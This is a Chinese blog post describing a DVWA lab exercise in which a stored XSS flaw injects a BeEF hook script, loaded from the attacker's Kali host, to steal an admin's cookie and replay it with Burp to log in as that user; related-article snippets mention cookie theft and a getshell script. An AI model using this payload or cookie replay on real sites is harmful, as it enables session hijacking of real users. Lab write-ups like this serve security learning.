利用xss漏洞获取cookie并实现远程登录实验

最新推荐文章于 2024-05-17 08:10:09 发布
最新推荐文章于 2024-05-17 08:10:09 发布
阅读量261 收藏 1
点赞数 2
文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_81105681/article/details/137974668
版权

本实验用到的环境为:DVWA靶场

  服务器:winserver 2022 (192.168.25.156)

  攻击机:kali

  受害者:win 10

1.

kali攻击机打开beef-xss

恶意代码:

<script src="http://kali的ip:3000/hook.js"></script>

2.

攻击机登录dvwa,打开存在xss漏洞的页面

攻击机登录的账户为smithy

输入恶意代码

注意:这个输入框需要按F12在前端代码中修改最长字符

3.

受害者访问该页面

受害者登录的账户为admin

访问到被注入恶意代码的页面,这时受害者还没有察觉到。

4.

攻击机的beef页面中发现受害者上钩,获得受害者的cookie

5.

访问登录页面192.168.25.156/dvwa/index.php

用burp抓包

用beef截获到受害者的cookie替换登录数据包的cookie,使用受害者的身份完成登录

实验结束

想学渗透的脚本小子
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DVWA——XSS(Reflected)——多种方法实现+详细步骤图解+获取cookie利用过程演示
weixin_46709219的博客
01-25 1万+
一)XSS(Reflected)介绍: 反射型xss(非持久型):需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。特点:弹窗警告、广告;javascript;在浏览器中执行。 通过Web站点漏洞,向客户交付恶意脚本代码,实现对客户端的攻击;恶意攻击者往Web页面里插入恶意的 Script 代码,当用户浏览该页面时,嵌入其中 Web 里面的 Script 代码就会被执行,从而达到恶意攻击用户的目的;注入客户端脚本代码、盗取cookie、重定向等。 二)实际
搭建DVWA漏洞环境
m0_62207482的博客
02-20 709
Database” 按钮进行安装,安装成功后则如图2-11所示,单击 “login” 即可登录,默 认账号为admin, 密码为password。件,找到allow_url_include, 把Off 改为On, 然后重启PHP即可解决这个问题,如图 2-12所示。接着修改config 文件夹下的config.inc.php 中数据库的用户名、密码、数据库 名,如图2-10所示。/phpMyAdmin/, 创建名为 “dvwa” 的数据 库,如图2-9所示。
通达OA v11.7 在线用户登录漏洞复现(附带一键getshell脚本)
最新发布
Innocence_0的博客
05-17 776
在文章的顶部先说明,本文章所介绍的内容以及所附带的脚本仅供学习,如果存在有牟利行为,个人负责!!!仅用于学习娱乐,切勿用于非法用途!请于下载后24小时内删除,使用者承担所有法律责任!一个类似于越权的漏洞,但是利用的方式确实比较特殊。
Kali Linux搭建DVWA漏洞靶场(保姆式教学)
apple_51319648的博客
01-06 2070
前提1.搭建好Kali Linux虚拟机2.下载DVMA-master压缩包。
XSS学习(cookie远程登录演示)
csjjjd的博客
03-26 1062
打开插件,导出为JSON,然后把这个cookie复制,在另外的火狐浏览器导入你edge浏览器博客园的cookie。说我都要进行一次重新登陆,可是实际之中为什么不是这样的呢?HTTP是无状态的,所按理来说我每进行一次会话,比如我在CSDN发一个帖子,好像按理来。获取你的cookie后能够做出什么事情我上面已经给大家演示过了。其中,每个键值对表示一个特定的属性或数值。首先我是用edge浏览器和火狐浏览器上安装这个插件。我是用博客园这个网站做演示,首先登录你的账号,然后。这个例子中包含了两个键值对(
使用XSS漏洞获取cookies
Decaede的博客
01-26 1017
使用XSS漏洞获取cookies
dvwaXSS(reflected)
ANDTM的博客
06-07 383
XSS,全称Cross Site Scripting,即跨站脚本攻击,也相当于是一种代码注入攻击,hacker在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行。根据注入的恶意代码是否存储在服务器数据库中,XSS可以分为存储型的XSS与反射型的XSS,还有DOM型的XSS由于其特殊性,常常被分为第三种。SS利用的常见用途:盗取用户cookies、劫持会话、流量劫持、网页挂马、DDOS、提升权限…
常见漏洞利用exphub
01-23
Exphub是一个汇聚了多种常见Web安全漏洞利用代码的开源项目,主要面向网络安全研究者、渗透测试人员以及安全教育从业者。这个项目的目的是提供一个学习和实践的平台,帮助用户了解和掌握不同类型的Web应用程序漏洞的...
phpcms2008漏洞利用工具
10-13
XSS攻击则可以盗取用户cookie实现会话劫持;命令执行漏洞可能导致服务器执行攻击者指定的系统命令。 了解了这些漏洞类型后,我们来看phpcms-2008-exp这个文件。这很可能是一个用于测试和利用phpcms2008特定漏洞的...
phpcmsv9最新利用工具
04-01
在计算机软件中,漏洞是指程序设计或实现中的错误、疏忽或缺陷,这些瑕疵可能被恶意用户利用,对系统进行未授权访问、数据篡改甚至完全控制。phpcmsV9作为一款基于PHP语言开发的CMS,同样可能存在代码层面的漏洞,...
web中间件常见漏洞总结.pdf
12-14
2. **跨站脚本(XSS)**:XSS漏洞允许攻击者在页面中注入恶意脚本,这些脚本可在用户的浏览器中执行,可能导致窃取cookie、会话劫持或其他恶意行为。 3. **跨站请求伪造(CSRF)**:CSRF攻击利用了浏览器的自动身份...
IPS4RemoteLogin:远程登录IPS4
05-24
9. **安全性最佳实践**:遵循安全编码规范,如SQL注入防护、XSS防护,以及定期更新依赖库以防止已知漏洞。 在"IPS4RemoteLogin-master"这个压缩包中,很可能包含了实现上述功能的所有源代码文件,包括PHP脚本、配置...
基于dvwa的反射性xss获取其中的cookie分享篇
weixin_47319512的博客
05-10 1364
好切回正题,这段代码的是正则表达意思就是把这些'/
XSS漏洞利用cookie获取
good good study
08-01 9900
目录 环境搭建 盗取cookie 关于documen.cookie获取不到cookie httponly 刚学习xss的时候我们都知道只要能弹窗就肯定存在xss漏洞,也知道xss是可以盗取cookie的,但是至于怎么盗取cookie其实很多同学可能还不是很清楚,也可能并没有实质性的去探讨过这个问题。 环境搭建 思路:攻击者本地搭建的一个网站存在xss漏洞,并且在与网站同一个ip的服务器中使用浏览器进行了登录,此时访问了一个恶意链接,这个恶意链接,直接将cookie获取并发送到hacker服务
如何用kali Linux进行DNS欺骗、窃取cookies,使用SSLstrip
热门推荐
huxdl的博客
12-24 1万+
由于入侵检测这门课要做PPT讲解,所以我研究了一下Kali linux上的一些实验,首先介绍一下kali linux: 按照官方网站的定义,Kali Linux是一个高级渗透测试和安全审计Linux发行版。作为使用者,我简单的把它理解为,一个特殊的Linux发行版,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用。也可称之为平台或者框架。集成超过300个渗透测试工具。(
安全测试学习(一)常见安全漏洞
我的成长之路
02-11 4270
常见的安全测试类型 登录失败提示信息 需要模糊提示,如“用户名或密码错误”,不能精确提示 登录失败次数限制或验证码刷新 登录失败后需要自动刷新验证码;达到一定失败次数后需要限制登录 登入登出前后,session值需要发生变化 Chrome如何查看sessionID:高级设置–内容设置–Cookie 目录遍历 只输入系统IP,在后面添加…/…/,查看是否能回到上级目录 网址后面加上./WEB-I...
xss漏洞测试(cookie的窃取和利用,钓鱼,键盘记录)
qq_43814486的博客
05-03 3906
cookie的窃取和利用
【安全】P 4-2 XSS盗取cookie
Z_David_Z的博客
02-17 381
目录0X01 cookie介绍0X02 反射XSS盗取cookie0X03 利用cookie会话劫持0X04 劫持会话后的操作 0X01 cookie介绍 Cookie 是在 HTTP 协议下,服务器或脚本可以维护客户工作站上信息的一种方式。Cookie 是由 Web 服务器保存在用户浏览器(客户端)上的小文本文件,它可以包含有关用户的信息。 目前有些 Cookie 是临时的,有些则是持续的。临时的 Cookie 只在浏览器上保存一段规定的时间,一旦超过规定的时间,该 Cookie 就会被系统清除 服务器可
xss漏洞检测工具的实现
04-26
实现xss漏洞检测工具的主要步骤包括以下几个方面: 1. 收集输入点:收集网站中所有的表单、URL参数和Cookie等用户输入位置,作为检测的输入点。 2. 构造检测数据:针对每个输入点,构造不同类型的恶意数据(如、等...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值